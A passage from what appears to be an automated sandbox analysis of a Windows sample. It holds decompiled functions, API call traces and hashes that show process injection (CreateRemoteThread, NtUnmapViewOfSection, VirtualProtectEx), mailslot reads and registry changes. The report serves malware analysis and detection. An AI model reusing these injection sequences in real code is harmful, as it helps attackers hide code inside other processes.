				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
